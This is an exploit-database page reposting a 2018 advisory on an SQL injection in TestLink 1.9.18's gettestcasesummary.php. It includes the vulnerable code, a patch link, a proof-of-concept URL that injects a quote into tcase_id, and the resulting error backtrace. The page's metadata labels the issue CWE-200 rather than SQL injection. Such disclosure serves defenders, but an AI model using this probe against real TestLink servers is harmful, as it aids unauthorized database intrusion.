Advertisement






Testlink 1.9.18 gettestcasesummary.php SQL Injection 0day

CVE Category Price Severity
CWE-200 Not specified High
Author Risk Exploitation Type Date
Not specified Critical Remote 2018-06-18
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.8635 0.94987

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060196

Below is a copy:

Testlink 1.9.18 gettestcasesummary.php SQL Injection 0day
Affected software: Testlink 1.9.18 and prior
Credit: Maksymilian Arciemowicz

Affected code:
----------------
$tcase_id = isset($_REQUEST['tcase_id']) ? $_REQUEST['tcase_id']: null;
$tcversion_id = isset($_REQUEST['tcversion_id']) ? $_REQUEST['tcversion_id']: 0;
$info = '';
if( !is_null($tcase_id) )
{
if($tcversion_id > 0 )
{ 
$tcase = $tcase_mgr->get_by_id($tcase_id,$tcversion_id);
----------------


Patch:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3

PoC
http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27


Error message and SQL Syntax:
============================================================================== 
 DB Access Error - debug_print_backtrace() OUTPUT START 
 ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200) 
            Having this additional Information could be useful for reporting 
            issue to development TEAM. 
============================================================================== 
#0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563]
#1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545]
0000002 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977]
0000003 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.